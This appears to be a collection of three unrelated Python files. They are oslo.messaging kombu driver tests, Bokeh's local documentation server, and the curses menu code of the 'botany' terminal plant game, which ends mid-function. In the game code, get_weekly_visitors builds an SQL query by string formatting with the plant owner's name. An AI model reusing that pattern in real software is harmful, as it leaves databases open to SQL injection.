expected = {
'oslo.version': '2.0',
'oslo.message': expected_msg,
}
self.assertEqual(expected, received)
TestRequestWireFormat.generate_scenarios()
def _create_producer(target):
connection = kombu.connection.BrokerConnection(transport='memory')
# Kludge to speed up tests.
connection.transport.polling_interval = 0.0
connection.connect()
channel = connection.channel()
# work around 'memory' transport bug in 1.1.3
channel._new_queue('ae.undeliver')
if target.fanout:
exchange = kombu.entity.Exchange(name=target.topic + '_fanout',
type='fanout',
durable=False,
auto_delete=True)
producer = kombu.messaging.Producer(exchange=exchange,
channel=channel,
routing_key=target.topic)
elif target.server:
exchange = kombu.entity.Exchange(name='openstack',
type='topic',
durable=False,
auto_delete=False)
topic = '%s.%s' % (target.topic, target.server)
producer = kombu.messaging.Producer(exchange=exchange,
channel=channel,
routing_key=topic)
else:
exchange = kombu.entity.Exchange(name='openstack',
type='topic',
durable=False,
auto_delete=False)
producer = kombu.messaging.Producer(exchange=exchange,
channel=channel,
routing_key=target.topic)
return connection, producer
class TestReplyWireFormat(test_utils.BaseTestCase):
_target = [
('topic_target',
dict(topic='testtopic', server=None, fanout=False)),
('server_target',
dict(topic='testtopic', server='testserver', fanout=False)),
('fanout_target',
dict(topic='testtopic', server=None, fanout=True)),
]
_msg = [
('empty_msg',
dict(msg={}, expected={})),
('primitive_msg',
dict(msg={'foo': 'bar'}, expected={'foo': 'bar'})),
('complex_msg',
dict(msg={'a': {'b': '1920-02-03T04:05:06.000007'}},
expected={'a': {'b': '1920-02-03T04:05:06.000007'}})),
]
_context = [
('empty_ctxt', dict(ctxt={}, expected_ctxt={'client_timeout': None})),
('user_project_ctxt',
dict(ctxt={'_context_user': 'mark',
'_context_project': 'snarkybunch'},
expected_ctxt={'user': 'mark', 'project': 'snarkybunch',
'client_timeout': None})),
]
_compression = [
('gzip_compression', dict(compression='gzip')),
('without_compression', dict(compression=None))
]
@classmethod
def generate_scenarios(cls):
cls.scenarios = testscenarios.multiply_scenarios(cls._msg,
cls._context,
cls._target,
cls._compression)
def test_reply_wire_format(self):
self.conf.oslo_messaging_rabbit.kombu_compression = self.compression
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
self.addCleanup(transport.cleanup)
driver = transport._driver
target = oslo_messaging.Target(topic=self.topic,
server=self.server,
fanout=self.fanout)
listener = driver.listen(target, None, None)._poll_style_listener
connection, producer = _create_producer(target)
self.addCleanup(connection.release)
msg = {
'oslo.version': '2.0',
'oslo.message': {}
}
msg['oslo.message'].update(self.msg)
msg['oslo.message'].update(self.ctxt)
msg['oslo.message'].update({
'_msg_id': uuid.uuid4().hex,
'_unique_id': uuid.uuid4().hex,
'_reply_q': 'reply_' + uuid.uuid4().hex,
'_timeout': None,
})
msg['oslo.message'] = jsonutils.dumps(msg['oslo.message'])
producer.publish(msg)
received = listener.poll()[0]
self.assertIsNotNone(received)
self.assertEqual(self.expected_ctxt, received.ctxt)
self.assertEqual(self.expected, received.message)
TestReplyWireFormat.generate_scenarios()
class RpcKombuHATestCase(test_utils.BaseTestCase):
def setUp(self):
super(RpcKombuHATestCase, self).setUp()
transport_url = 'rabbit:/host1,host2,host3,host4,host5/'
self.messaging_conf.transport_url = transport_url
self.config(rabbit_retry_interval=0.01,
rabbit_retry_backoff=0.01,
kombu_reconnect_delay=0,
heartbeat_timeout_threshold=0,
group="oslo_messaging_rabbit")
self.useFixture(fixtures.MockPatch(
'kombu.connection.Connection.connection'))
self.useFixture(fixtures.MockPatch(
'kombu.connection.Connection.channel'))
# starting from the first broker in the list
url = oslo_messaging.TransportURL.parse(self.conf, None)
self.connection = rabbit_driver.Connection(self.conf, url,
driver_common.PURPOSE_SEND)
self.useFixture(fixtures.MockPatch(
'kombu.connection.Connection.connect'))
self.addCleanup(self.connection.close)
def test_ensure_four_retry(self):
mock_callback = mock.Mock(side_effect=IOError)
self.assertRaises(oslo_messaging.MessageDeliveryFailure,
self.connection.ensure, mock_callback,
retry=4)
self.assertEqual(6, mock_callback.call_count)
def test_ensure_one_retry(self):
mock_callback = mock.Mock(side_effect=IOError)
self.assertRaises(oslo_messaging.MessageDeliveryFailure,
self.connection.ensure, mock_callback,
retry=1)
self.assertEqual(3, mock_callback.call_count)
def test_ensure_no_retry(self):
mock_callback = mock.Mock(side_effect=IOError)
self.assertRaises(oslo_messaging.MessageDeliveryFailure,
self.connection.ensure, mock_callback,
retry=0)
self.assertEqual(2, mock_callback.call_count)
class ConnectionLockTestCase(test_utils.BaseTestCase):
def _thread(self, lock, sleep, heartbeat=False):
def thread_task():
if heartbeat:
with lock.for_heartbeat():
time.sleep(sleep)
else:
with lock:
time.sleep(sleep)
t = threading.Thread(target=thread_task)
t.daemon = True
t.start()
start = time.time()
def get_elapsed_time():
t.join()
return time.time() - start
return get_elapsed_time
def test_workers_only(self):
l = rabbit_driver.ConnectionLock()
t1 = self._thread(l, 1)
t2 = self._thread(l, 1)
self.assertAlmostEqual(1, t1(), places=0)
self.assertAlmostEqual(2, t2(), places=0)
def test_worker_and_heartbeat(self):
l = rabbit_driver.ConnectionLock()
t1 = self._thread(l, 1)
t2 = self._thread(l, 1, heartbeat=True)
self.assertAlmostEqual(1, t1(), places=0)
self.assertAlmostEqual(2, t2(), places=0)
def test_workers_and_heartbeat(self):
l = rabbit_driver.ConnectionLock()
t1 = self._thread(l, 1)
t2 = self._thread(l, 1)
t3 = self._thread(l, 1)
t4 = self._thread(l, 1, heartbeat=True)
t5 = self._thread(l, 1)
self.assertAlmostEqual(1, t1(), places=0)
self.assertAlmostEqual(2, t4(), places=0)
self.assertAlmostEqual(3, t2(), places=0)
self.assertAlmostEqual(4, t3(), places=0)
self.assertAlmostEqual(5, t5(), places=0)
def test_heartbeat(self):
l = rabbit_driver.ConnectionLock()
t1 = self._thread(l, 1, heartbeat=True)
t2 = self._thread(l, 1)
self.assertAlmostEqual(1, t1(), places=0)
self.assertAlmostEqual(2, t2(), places=0)
|
docserver.py
|
from __future__ import print_function
import flask
import os
import threading
import time
import webbrowser
from tornado.wsgi import WSGIContainer
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
_basedir = os.path.join("..", os.path.dirname(__file__))
app = flask.Flask(__name__, static_path="/unused")
PORT=5009
http_server = HTTPServer(WSGIContainer(app))
"""this is a simple server to facilitate developing the docs. by
serving up static files from this server, we avoid the need to use a
symlink.
"""
@app.route('/')
def welcome():
return """
<h1>Welcome to the Bokeh documentation server</h1>
You probably want to go to <a href="/en/latest/index.html"> Index</a>
"""
@app.route('/en/latest/<path:filename>')
def send_pic(filename):
return flask.send_from_directory(
os.path.join(_basedir,"sphinx/_build/html/"), filename)
def open_browser():
# Child process
time.sleep(0.5)
webbrowser.open("http://localhost:%d/en/latest/index.html" % PORT, new="tab")
def serve_http():
http_server.listen(PORT)
IOLoop.instance().start()
def shutdown_server():
ioloop = IOLoop.instance()
ioloop.add_callback(ioloop.stop)
print("Asked Server to shut down.")
def ui():
time.sleep(0.5)
input("Press <ENTER> to exit...\n")
if __name__ == "__main__":
print("\nStarting Bokeh plot server on port %d..." % PORT)
print("Visit http://localhost:%d/en/latest/index.html to see plots\n" % PORT)
t_server = threading.Thread(target=serve_http)
t_server.start()
t_browser = threading.Thread(target=open_browser)
t_browser.start()
ui()
shutdown_server()
t_server.join()
t_browser.join()
print("Server shut down.")
|
menu_screen.py
|
import curses
import math
import os
import traceback
import threading
import time
import random
import getpass
import json
import sqlite3
import string
import re
import completer
import datetime
class CursedMenu(object):
#TODO: name your plant
'''A class which abstracts the horrors of building a curses-based menu system'''
def __init__(self, this_plant, this_data):
'''Initialization'''
self.initialized = False
self.screen = curses.initscr()
curses.noecho()
curses.raw()
if curses.has_colors():
curses.start_color()
try:
curses.curs_set(0)
except curses.error:
# Not all terminals support this functionality.
# When the error is ignored the screen will look a little uglier, but that's not terrible
# So in order to keep botany as accesible as possible to everyone, it should be safe to ignore the error.
pass
self.screen.keypad(1)
self.plant = this_plant
self.visited_plant = None
self.user_data = this_data
self.plant_string = self.plant.parse_plant()
self.plant_ticks = str(int(self.plant.ticks))
self.exit = False
self.infotoggle = 0
self.maxy, self.maxx = self.screen.getmaxyx()
# Highlighted and Normal line definitions
if curses.has_colors():
self.define_colors()
self.highlighted = curses.color_pair(1)
else:
self.highlighted = curses.A_REVERSE
self.normal = curses.A_NORMAL
# Threaded screen update for live changes
screen_thread = threading.Thread(target=self.update_plant_live, args=())
screen_thread.daemon = True
screen_thread.start()
# Recusive lock to prevent both threads from drawing at the same time
self.screen_lock = threading.RLock()
self.screen.clear()
self.show(["water","look","garden","visit", "instructions"], title=' botany ', subtitle='options')
def define_colors(self):
# set curses color pairs manually
curses.init_pair(1, curses.COLOR_BLACK, curses.COLOR_WHITE)
curses.init_pair(2, curses.COLOR_WHITE, curses.COLOR_BLACK)
curses.init_pair(3, curses.COLOR_GREEN, curses.COLOR_BLACK)
curses.init_pair(4, curses.COLOR_BLUE, curses.COLOR_BLACK)
curses.init_pair(5, curses.COLOR_MAGENTA, curses.COLOR_BLACK)
curses.init_pair(6, curses.COLOR_YELLOW, curses.COLOR_BLACK)
curses.init_pair(7, curses.COLOR_RED, curses.COLOR_BLACK)
curses.init_pair(8, curses.COLOR_CYAN, curses.COLOR_BLACK)
ESC_CODE_TO_PAIR = {
'' : 0, # normal
'0' : 0, # normal
'30' : 1, # black
'31' : 7, # red
'32' : 3, # green
'33' : 6, # yellow
'34' : 4, # blue
'35' : 5, # magenta
'36' : 8, # cyan
'37' : 2 # white
}
def esc_code_to_color(self, esc_code):
return curses.color_pair(self.ESC_CODE_TO_PAIR.get(esc_code, 0))
def show(self, options, title, subtitle):
# Draws a menu with parameters
self.set_options(options)
self.update_options()
self.title = title
self.subtitle = subtitle
self.selected = 0
self.initialized = True
self.draw_menu()
def update_options(self):
# Makes sure you can get a new plant if it dies
if self.plant.dead or self.plant.stage == 5:
if "harvest" not in self.options:
self.options.insert(-1,"harvest")
else:
if "harvest" in self.options:
self.options.remove("harvest")
def set_options(self, options):
# Validates that the last option is "exit"
if options[-1] != 'exit':
options.append('exit')
self.options = options
def draw(self):
# Draw the menu and lines
self.maxy, self.maxx = self.screen.getmaxyx()
self.screen_lock.acquire()
self.screen.refresh()
try:
self.draw_default()
self.screen.refresh()
except Exception as exception:
# Makes sure data is saved in event of a crash due to window resizing
self.screen.clear()
self.screen.addstr(0, 0, "Enlarge terminal!", curses.A_NORMAL)
self.screen.refresh()
self.__exit__()
traceback.print_exc()
self.screen_lock.release()
def draw_menu(self):
# Actually draws the menu and handles branching
request = ""
try:
while request != "exit":
self.draw()
request = self.get_user_input()
self.handle_request(request)
self.__exit__()
# Also calls __exit__, but adds traceback after
except Exception as exception:
self.screen.clear()
self.screen.addstr(0, 0, "Enlarge terminal!", curses.A_NORMAL)
self.screen.refresh()
self.__exit__()
#traceback.print_exc()
except IOError as exception:
self.screen.clear()
self.screen.refresh()
self.__exit__()
def ascii_render(self, filename, ypos, xpos):
# Prints ASCII art from file at given coordinates
this_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)),"art")
this_filename = os.path.join(this_dir,filename + '.txt')
this_file = open(this_filename,"r")
this_string = this_file.readlines()
this_file.close()
self.screen_lock.acquire()
for y, line in enumerate(this_string, 2):
self.screen.addstr(ypos+y, xpos, line, curses.A_NORMAL)
# self.screen.refresh()
self.screen_lock.release()
def ansi_render(self, filename, ypos, xpos):
# Prints ANSI art from file at given coordinates
# Falls back on ASCII if no ANSI version exists
# Assumes curses.has_colors()
this_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)),"art")
this_filename = os.path.join(this_dir,filename + '.ansi')
if not os.path.exists(this_filename):
self.ascii_render(filename, ypos, xpos)
return
this_file = open(this_filename,"r")
this_string = this_file.readlines()
this_file.close()
self.screen_lock.acquire()
color = curses.A_NORMAL
for y, line in enumerate(this_string, 2):
code_text_pairs = [tuple(token.split('m', 1)) if 'm' in token else (None, token)
for token in line.rstrip('\r\n').split('\x1b[') ]
color_text_pairs = [(color, text) if code == None else (self.esc_code_to_color(code), text)
for (code, text) in code_text_pairs]
x = 0
for (color, text) in color_text_pairs:
# Handle overflowing art gracefully
text = text[:max(0, self.maxx-(xpos+x))]
if not text:
continue
self.screen.addstr(ypos+y, xpos+x, text, color)
x += len(text)
self.screen_lock.release()
def art_render(self, filename, ypos, xpos):
if curses.has_colors():
self.ansi_render(filename, ypos, xpos)
else:
self.ascii_render(filename, ypos, xpos)
def draw_plant_ascii(self, this_plant):
ypos = 0
xpos = int((self.maxx-37)/2 + 25)
plant_art_list = [
'poppy',
'cactus',
'aloe',
'flytrap',
'jadeplant',
'fern',
'daffodil',
'sunflower',
'baobab',
'lithops',
'hemp',
'pansy',
'iris',
'agave',
'ficus',
'moss',
'sage',
'snapdragon',
'columbine',
'brugmansia',
'palm',
'pachypodium',
]
if this_plant.dead == True:
self.art_render('rip', ypos, xpos)
elif datetime.date.today().month == 10 and datetime.date.today().day == 31:
self.art_render('jackolantern', ypos, xpos)
elif this_plant.stage == 0:
self.art_render('seed', ypos, xpos)
elif this_plant.stage == 1:
self.art_render('seedling', ypos, xpos)
elif this_plant.stage == 2:
this_filename = plant_art_list[this_plant.species]+'1'
self.art_render(this_filename, ypos, xpos)
elif this_plant.stage == 3 or this_plant.stage == 5:
this_filename = plant_art_list[this_plant.species]+'2'
self.art_render(this_filename, ypos, xpos)
elif this_plant.stage == 4:
this_filename = plant_art_list[this_plant.species]+'3'
self.art_render(this_filename, ypos, xpos)
def draw_default(self):
# draws default menu
clear_bar = " " * (int(self.maxx*2/3))
self.screen_lock.acquire()
self.screen.addstr(1, 2, self.title, curses.A_STANDOUT) # Title for this menu
self.screen.addstr(3, 2, self.subtitle, curses.A_BOLD) #Subtitle for this menu
# clear menu on screen
for index in range(len(self.options)+1):
self.screen.addstr(4+index, 4, clear_bar, curses.A_NORMAL)
# display all the menu items, showing the 'pos' item highlighted
for index in range(len(self.options)):
textstyle = self.normal
if index == self.selected:
textstyle = self.highlighted
self.screen.addstr(4+index ,4, clear_bar, curses.A_NORMAL)
self.screen.addstr(4+index ,4, "%d - %s" % (index+1, self.options[index]), textstyle)
self.screen.addstr(12, 2, clear_bar, curses.A_NORMAL)
self.screen.addstr(13, 2, clear_bar, curses.A_NORMAL)
self.screen.addstr(12, 2, "plant: ", curses.A_DIM)
self.screen.addstr(12, 9, self.plant_string, curses.A_NORMAL)
self.screen.addstr(13, 2, "score: ", curses.A_DIM)
self.screen.addstr(13, 9, self.plant_ticks, curses.A_NORMAL)
# display fancy water gauge
if not self.plant.dead:
water_gauge_str = self.water_gauge()
self.screen.addstr(4,14, water_gauge_str, curses.A_NORMAL)
else:
self.screen.addstr(4,13, clear_bar, curses.A_NORMAL)
self.screen.addstr(4,14, "( RIP )", curses.A_NORMAL)
# draw cute ascii from files
if self.visited_plant:
# Needed to prevent drawing over a visited plant
self.draw_plant_ascii(self.visited_plant)
else:
self.draw_plant_ascii(self.plant)
self.screen_lock.release()
def water_gauge(self):
# build nice looking water gauge
water_left_pct = 1 - ((time.time() - self.plant.watered_timestamp)/86400)
# don't allow negative value
water_left_pct = max(0, water_left_pct)
water_left = int(math.ceil(water_left_pct * 10))
water_string = "(" + (")" * water_left) + ("." * (10 - water_left)) + ") " + str(int(water_left_pct * 100)) + "% "
return water_string
def update_plant_live(self):
# updates plant data on menu screen, live!
while not self.exit:
self.plant_string = self.plant.parse_plant()
self.plant_ticks = str(int(self.plant.ticks))
if self.initialized:
self.update_options()
self.draw()
time.sleep(1)
def get_user_input(self):
# gets the user's input
try:
user_in = self.screen.getch() # Gets user input
except Exception as e:
self.__exit__()
if user_in == -1: # Input comes from pipe/file and is closed
raise IOError
## DEBUG KEYS - enable these lines to see curses key codes
# self.screen.addstr(2, 2, str(user_in), curses.A_NORMAL)
# self.screen.refresh()
# Resize sends curses.KEY_RESIZE, update display
if user_in == curses.KEY_RESIZE:
self.maxy,self.maxx = self.screen.getmaxyx()
self.screen.clear()
self.screen.refresh()
# enter, exit, and Q Keys are special cases
if user_in == 10:
return self.options[self.selected]
if user_in == 27:
return self.options[-1]
if user_in == 113:
self.selected = len(self.options) - 1
return
# this is a number; check to see if we can set it
if user_in >= ord('1') and user_in <= ord(str(min(7,len(self.options)))):
self.selected = user_in - ord('0') - 1 # convert keypress back to a number, then subtract 1 to get index
return
# increment or Decrement
down_keys = [curses.KEY_DOWN, 14, ord('j')]
up_keys = [curses.KEY_UP, 16, ord('k')]
if user_in in down_keys: # down arrow
self.selected += 1
if user_in in up_keys: # up arrow
self.selected -=1
# modulo to wrap menu cursor
self.selected = self.selected % len(self.options)
return
def format_garden_data(self,this_garden):
# Returns list of lists (pages) of garden entries
plant_table = []
for plant_id in this_garden:
if this_garden[plant_id]:
if not this_garden[plant_id]["dead"]:
this_plant = this_garden[plant_id]
plant_table.append((this_plant["owner"],
this_plant["age"],
int(this_plant["score"]),
this_plant["description"]))
return plant_table
def format_garden_entry(self, entry):
return "{:14.14} - {:>16} - {:>8}p - {}".format(*entry)
def sort_garden_table(self, table, column, ascending):
""" Sort table in place by a specified column """
def key(entry):
entry = entry[column]
# In when sorting ages, convert to seconds
if column == 1:
coeffs = [24*60*60, 60*60, 60, 1]
nums = [int(n[:-1]) for n in entry.split(":")]
if len(nums) == len(coeffs):
entry = sum(nums[i] * coeffs[i] for i in range(len(nums)))
return entry
return table.sort(key=key, reverse=not ascending)
def filter_garden_table(self, table, pattern):
""" Filter table using a pattern, and return the new table """
def filterfunc(entry):
if len(pattern) == 0:
return True
entry_txt = self.format_garden_entry(entry)
try:
result = bool(re.search(pattern, entry_txt))
except Exception as e:
# In case of invalid regex, don't match anything
result = False
return result
return list(filter(filterfunc, table))
def draw_garden(self):
# draws community garden
# load data from sqlite db
this_garden = self.user_data.retrieve_garden_from_db()
# format data
self.clear_info_pane()
if self.infotoggle == 2:
# the screen IS currently showing the garden (1 page), make the
# text a bunch of blanks to clear it out
self.infotoggle = 0
return
# if infotoggle isn't 2, the screen currently displays other stuff
plant_table_orig = self.format_garden_data(this_garden)
self.infotoggle = 2
# print garden information OR clear it
index = 0
sort_column, sort_ascending = 0, True
sort_keys = ["n", "a", "s", "d"] # Name, Age, Score, Description
plant_table = plant_table_orig
self.sort_garden_table(plant_table, sort_column, sort_ascending)
while True:
entries_per_page = self.maxy - 16
index_max = min(len(plant_table), index + entries_per_page)
plants = plant_table[index:index_max]
page = [self.format_garden_entry(entry) for entry in plants]
self.screen_lock.acquire()
self.draw_info_text(page)
# Multiple pages, paginate and require keypress
page_text = "(%d-%d/%d) | sp/next | bksp/prev | s <col #>/sort | f/filter | q/quit" % (index, index_max, len(plant_table))
self.screen.addstr(self.maxy-2, 2, page_text)
self.screen.refresh()
self.screen_lock.release()
c = self.screen.getch()
if c == -1: # Input comes from pipe/file and is closed
raise IOError
self.infotoggle = 0
# Quit
if c == ord("q") or c == ord("x") or c == 27:
break
# Next page
elif c in [curses.KEY_ENTER, curses.KEY_NPAGE, ord(" "), ord("\n")]:
index += entries_per_page
if index >= len(plant_table):
break
# Previous page
elif c == curses.KEY_BACKSPACE or c == curses.KEY_PPAGE:
index = max(index - entries_per_page, 0)
# Next line
elif c == ord("j") or c == curses.KEY_DOWN:
index = max(min(index + 1, len(plant_table) - 1), 0)
# Previous line
elif c == ord("k") or c == curses.KEY_UP:
index = max(index - 1, 0)
# Sort entries
elif c == ord("s"):
c = self.screen.getch()
if c == -1: # Input comes from pipe/file and is closed
raise IOError
column = -1
if c < 255 and chr(c) in sort_keys:
column = sort_keys.index(chr(c))
elif ord("1") <= c <= ord("4"):
column = c - ord("1")
if column != -1:
if sort_column == column:
sort_ascending = not sort_ascending
else:
sort_column = column
sort_ascending = True
self.sort_garden_table(plant_table, sort_column, sort_ascending)
# Filter entries
elif c == ord("/") or c == ord("f"):
self.screen.addstr(self.maxy-2, 2, "Filter: " + " " * (len(page_text)-8))
pattern = self.get_user_string(10, self.maxy-2, lambda x: x in string.printable)
plant_table = self.filter_garden_table(plant_table_orig, pattern)
self.sort_garden_table(plant_table, sort_column, sort_ascending)
index = 0
# Clear page before drawing next
self.clear_info_pane()
self.clear_info_pane()
def get_plant_description(self, this_plant):
output_text = ""
this_species = this_plant.species_list[this_plant.species]
this_color = this_plant.color_list[this_plant.color]
this_stage = this_plant.stage
stage_descriptions = {
0:[
"You're excited about your new seed.",
"You wonder what kind of plant your seed will grow into.",
"You're ready for a new start with this plant.",
"You're tired of waiting for your seed to grow.",
"You wish your seed could tell you what it needs.",
"You can feel the spirit inside your seed.",
"These pretzels are making you thirsty.",
"Way to plant, Ann!",
"'To see things in the seed, that is genius' - Lao Tzu",
],
1:[
"The seedling fills you with hope.",
"The seedling shakes in the wind.",
"You can make out a tiny leaf - or is that a thorn?",
"You can feel the seedling looking back at you.",
"You blow a kiss to your seedling.",
"You think about all the seedlings who came before it.",
"You and your seedling make a great team.",
"Your seedling grows slowly and quietly.",
"You meditate on the paths your plant's life could take.",
],
2:[
"The " + this_species + " makes you feel relaxed.",
"You sing a song to your " + this_species + ".",
"You quietly sit with your " + this_species + " for a few minutes.",
"Your " + this_species + " looks pretty good.",
"You play loud techno to your " + this_species + ".",
"You play piano to your " + this_species + ".",
"You play rap music to your " + this_species + ".",
"You whistle a tune to your " + this_species + ".",
"You read a poem to your " + this_species + ".",
"You tell a secret to your " + this_species + ".",
"You play your favorite record for your " + this_species + ".",
],
3:[
"Your " + this_species + " is growing nicely!",
"You're proud of the dedication it took to grow your " + this_species + ".",
"You take a deep breath with your " + this_species + ".",
"You think of all the words that rhyme with " + this_species + ".",
"The " + this_species + " looks full of life.",
"The " + this_species + " inspires you.",
"Your " + this_species + " makes you forget about your problems.",
"Your " + this_species + " gives you a reason to keep going.",
"Looking at your " + this_species + " helps you focus on what matters.",
"You think about how nice this " + this_species + " looks here.",
"The buds of your " + this_species + " might bloom soon.",
],
4:[
"The " + this_color + " flowers look nice on your " + this_species +"!",
"The " + this_color + " flowers have bloomed and fill you with positivity.",
"The " + this_color + " flowers remind you of your childhood.",
"The " + this_color + " flowers remind you of spring mornings.",
"The " + this_color + " flowers remind you of a forgotten memory.",
"The " + this_color + " flowers remind you of your happy place.",
"The aroma of the " + this_color + " flowers energize you.",
"The " + this_species + " has grown beautiful " + this_color + " flowers.",
"The " + this_color + " petals remind you of that favorite shirt you lost.",
"The " + this_color + " flowers remind you of your crush.",
"You smell the " + this_color + " flowers and are filled with peace.",
],
5:[
"You fondly remember the time you spent caring for your " + this_species + ".",
"Seed pods have grown on your " + this_species + ".",
"You feel like your " + this_species + " appreciates your care.",
"The " + this_species + " fills you with love.",
"You're ready for whatever comes after your " + this_species + ".",
"You're excited to start growing your next plant.",
"You reflect on when your " + this_species + " was just a seedling.",
"You grow nostalgic about the early days with your " + this_species + ".",
],
99:[
"You wish you had taken better care of your plant.",
"If only you had watered your plant more often..",
"Your plant is dead, there's always next time.",
"You cry over the withered leaves of your plant.",
"Your plant died. Maybe you need a fresh start.",
],
}
# self.life_stages is tuple containing length of each stage
# (seed, seedling, young, mature, flowering)
if this_plant.dead:
this_stage = 99
this_stage_descriptions = stage_descriptions[this_stage]
description_num = random.randint(0,len(this_stage_descriptions) - 1)
# If not fully grown
if this_stage <= 4:
# Growth hint
if this_stage >= 1:
last_growth_at = this_plant.life_stages[this_stage - 1]
else:
last_growth_at = 0
ticks_since_last = this_plant.ticks - last_growth_at
ticks_between_stage = this_plant.life_stages[this_stage] - last_growth_at
if ticks_since_last >= ticks_between_stage * 0.8:
output_text += "You notice your plant looks different.\n"
output_text += this_stage_descriptions[description_num] + "\n"
# if seedling
if this_stage == 1:
species_options = [this_plant.species_list[this_plant.species],
this_plant.species_list[(this_plant.species+3) % len(this_plant.species_list)],
this_plant.species_list[(this_plant.species-3) % len(this_plant.species_list)]]
random.shuffle(species_options)
plant_hint = "It could be a(n) " + species_options[0] + ", " + species_options[1] + ", or " + species_options[2]
output_text += plant_hint + ".\n"
# if young plant
if this_stage == 2:
if this_plant.rarity >= 2:
rarity_hint = "You feel like your plant is special."
output_text += rarity_hint + ".\n"
# if mature plant
if this_stage == 3:
color_options = [this_plant.color_list[this_plant.color],
this_plant.color_list[(this_plant.color+3) % len(this_plant.color_list)],
this_plant.color_list[(this_plant.color-3) % len(this_plant.color_list)]]
random.shuffle(color_options)
plant_hint = "You can see the first hints of " + color_options[0] + ", " + color_options[1] + ", or " + color_options[2]
output_text += plant_hint + ".\n"
return output_text
def draw_plant_description(self, this_plant):
# If menu is currently showing something other than the description
self.clear_info_pane()
if self.infotoggle != 1:
# get plant description before printing
output_string = self.get_plant_description(this_plant)
growth_multiplier = 1 + (0.2 * (this_plant.generation-1))
output_string += "Generation: {}\nGrowth rate: {}x".format(self.plant.generation, growth_multiplier)
self.draw_info_text(output_string)
self.infotoggle = 1
else:
# otherwise just set toggle
self.infotoggle = 0
def draw_instructions(self):
# Draw instructions on screen
self.clear_info_pane()
if self.infotoggle != 4:
instructions_txt = ("welcome to botany. you've been given a seed\n"
"that will grow into a beautiful plant. check\n"
"in and water your plant every 24h to keep it\n"
"growing. 5 days without water = death. your\n"
"plant depends on you & your friends to live!\n"
"more info is available in the readme :)\n"
"https://github.com/jifunks/botany/blob/master/README.md\n"
" cheers,\n"
" curio\n"
)
self.draw_info_text(instructions_txt)
self.infotoggle = 4
else:
self.infotoggle = 0
def clear_info_pane(self):
# Clears bottom part of screen
self.screen_lock.acquire()
clear_bar = " " * (self.maxx - 3)
this_y = 14
while this_y < self.maxy:
self.screen.addstr(this_y, 2, clear_bar, curses.A_NORMAL)
this_y += 1
self.screen.refresh()
self.screen_lock.release()
def draw_info_text(self, info_text, y_offset = 0):
# print lines of text to info pane at bottom of screen
self.screen_lock.acquire()
if type(info_text) is str:
info_text = info_text.splitlines()
for y, line in enumerate(info_text, 2):
this_y = y+12 + y_offset
if len(line) > self.maxx - 3:
line = line[:self.maxx-3]
if this_y < self.maxy:
self.screen.addstr(this_y, 2, line, curses.A_NORMAL)
self.screen.refresh()
self.screen_lock.release()
def harvest_confirmation(self):
self.clear_info_pane()
# get plant description before printing
max_stage = len(self.plant.stage_list) - 1
harvest_text = ""
if not self.plant.dead:
if self.plant.stage == max_stage:
harvest_text += "Congratulations! You raised your plant to its final stage of growth.\n"
harvest_text += "Your next plant will grow at a speed of: {}x\n".format(1 + (0.2 * self.plant.generation))
harvest_text += "If you harvest your plant you'll start over from a seed.\nContinue? (Y/n)"
self.draw_info_text(harvest_text)
try:
user_in = self.screen.getch() # Gets user input
except Exception as e:
self.__exit__()
if user_in == -1: # Input comes from pipe/file and is closed
raise IOError
if user_in in [ord('Y'), ord('y')]:
self.plant.start_over()
else:
pass
self.clear_info_pane()
def build_weekly_visitor_output(self, visitors):
visitor_block = ""
visitor_line = ""
for visitor in visitors:
this_visitor_string = str(visitor) + "({}) ".format(visitors[str(visitor)])
if len(visitor_line + this_visitor_string) > self.maxx-3:
visitor_block += '\n'
visitor_line = ""
visitor_block += this_visitor_string
visitor_line += this_visitor_string
return visitor_block
def build_latest_visitor_output(self, visitors):
visitor_line = ""
for visitor in visitors:
if len(visitor_line + visitor) > self.maxx-10:
visitor_line += "and more"
break
visitor_line += visitor + ' '
return [visitor_line]
def get_weekly_visitors(self):
game_dir = os.path.dirname(os.path.realpath(__file__))
garden_db_path = os.path.join(game_dir, 'sqlite/garden_db.sqlite')
conn = sqlite3.connect(garden_db_path)
c = conn.cursor()
c.execute("SELECT * FROM visitors WHERE garden_name = '{}' ORDER BY weekly_visits".format(self.plant.owner))
visitor_data = c.fetchall()
conn.close()
visitor_block = ""
visitor_line = ""
if visitor_data:
for visitor in visitor_data:
visitor_name = visitor[2]
weekly_visits = visitor[3]
this_visitor_string = "{}({}) ".format(visitor_name, weekly_visits)
if len(visitor_line + this_visitor_string) > self.maxx-3:
visitor_block += '\n'
visitor_line = ""
visitor_block += this_visitor_string
visitor_line += this_visitor_string
else:
visitor_block = 'nobody :('
return visitor_block
def get_user_string(self, xpos=3, ypos=15, filterfunc=str.isalnum, completer=None):
# filter allowed characters using filterfunc, alphanumeric by default
user_string = ""
user_input = 0
if completer:
completer = completer(self)
while user_input != 10:
user_input = self.screen.getch()
if user_input == -1: # Input comes from pipe/file and is closed
raise IOError
self.screen_lock.acquire()
# osx and unix backspace chars...
if user_input == 127 or user_input == 263:
if len(user_string) > 0:
user_string = user_string[:-1]
if completer:
completer.update_input(user_string)
self.screen.addstr(ypos, xpos, " " * (self.maxx-xpos-1))
elif user_input in [ord('\t'), curses.KEY_BTAB] and completer:
direction = 1 if user_input == ord('\t') else -1
user_string = completer.complete(direction)
self.screen.addstr(ypos, xpos, " " * (self.maxx-xpos-1))
elif user_input < 256 and user_input != 10:
if filterfunc(chr(user_input)) or chr(user_input) == '_':
user_string += chr(user_input)
if completer:
completer.update_input(user_string)
self.screen.addstr(ypos, xpos, str(user_string))
self.screen.refresh()
self.screen_lock.release()
return user_string
def visit_handler(self):
self.clear_info_pane()
self.draw_info_text("whose plant would you like to visit?")
self.screen.addstr(15, 2, '~')
if self.plant.visitors:
latest_visitor_string = self.build_latest_visitor_output(self.plant.visitors)
self.draw_info_text("since last time, you were visited by: ", 3)
self.draw_info_text(latest_visitor_string, 4)
self.plant.visitors = []
weekly_visitor_text = self.get_weekly_visitors()
self.draw_info_text("this week you've been visited by: ", 6)
self.draw_info_text(weekly_visitor_text, 7)
guest_garden = self.get_user_string(completer = completer.LoginCompleter)
if not guest_garden:
self.clear_info_pane()
return None
if guest_garden.lower() == getpass.getuser().lower():
self.screen.addstr(16, 2, "you're already here!")
self.screen.getch()
self.clear_info_pane()
return None
home_folder = os.path.dirname(os.path.expanduser("~"))
